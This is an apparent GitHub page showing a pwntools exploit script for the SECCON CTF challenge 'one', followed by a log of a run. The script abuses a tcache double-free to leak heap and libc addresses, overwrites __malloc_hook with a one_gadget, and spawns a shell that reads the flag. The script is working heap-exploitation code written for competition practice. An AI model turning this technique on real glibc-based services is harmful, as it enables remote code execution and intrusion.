-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
97 lines (83 loc) · 2.37 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
#!/usr/bin/python
from pwn import *
context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'
elf = ELF('./one_ef36d5ef6169aeda65259f627f282930b93cf6e5')
local = True
if local == True:
libc = ELF('/lib/x86_64-linux-gnu/ld-2.27.so', checksec = False)
io = process(elf.path)
else:
libc = ELF('./libc-2.27.so_18292bd12d37bfaf58e8dded9db7f1f5da1192cb', checksec = False)
io = remote('one.chal.seccon.jp', 18357)
def add(data, shell = False):
io.recvuntil('> ')
io.sendline('1')
if shell == False:
io.recvuntil('memo > ')
io.sendline(data)
def show():
io.recvuntil('> ')
io.sendline('2')
return io.recvuntil('\nDone.', drop = True)
def delete():
io.recvuntil('> ')
io.sendline('3')
fake_chunk = ''
fake_chunk += p64(0x0) + p64(0x141)
fake_chunk += p64(0x0) * 2
add(p8(0x0) * 16 + fake_chunk)
delete()
delete()
heap_leak = u64(show().ljust(8, '\x00'))
log.success('Leaked heap address: ' + hex(heap_leak))
add(p64(heap_leak - 0x1260))
add('')
add(p8(0x0) * 3 + p8(0x3) + p8(0x0) * 14 + p8(0x07)) # Modify tcache_perthread counter array
add('')
add('')
add('')
add(p8(0x0) * 0x10 + p64(0x140) + p64(0x141))
add('')
add('')
add('')
add(p8(0x0) * 0x10 + p64(0x140) + p64(0x141))
delete()
delete()
add(p64(heap_leak + 0x20))
add('')
add('')
delete()
libc_leak = u64(show().ljust(8, '\x00'))
libc.address = libc_leak - 0x3ebca0
log.success('Leaked main_arena@@GLIBC: ' + hex(libc_leak))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('__malloc_hook@@GLIBC address: ' + hex(libc.address + 0x3ebc30))
log.info('One gadget address: ' + hex(libc.address + 0x4f322))
add('')
delete()
delete()
add(p64(libc.address + 0x3ebc30)) # __malloc_hook@@GLIBC_2.2.5 (pwntools does not work here)
add('')
add(p64(libc.address + 0x4f322)) # one_gadget
add('', shell = True)
io.interactive()
'''
kaorz@lab:~/seccon/one$ python xpl.py
[*] '/seccon/one/one_ef36d5ef6169aeda65259f627f282930b93cf6e5'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to one.chal.seccon.jp on port 18357: Done
[+] Leaked heap address: 0x55a1e9792270
[+] Leaked main_arena@@GLIBC: 0x7f2537b1eca0
[+] GLIBC base address: 0x7f2537733000
[*] Switching to interactive mode
$ ls
flag.txt
one
$ cat flag.txt
SECCON{4r3_y0u_u53d_70_7c4ch3?}
'''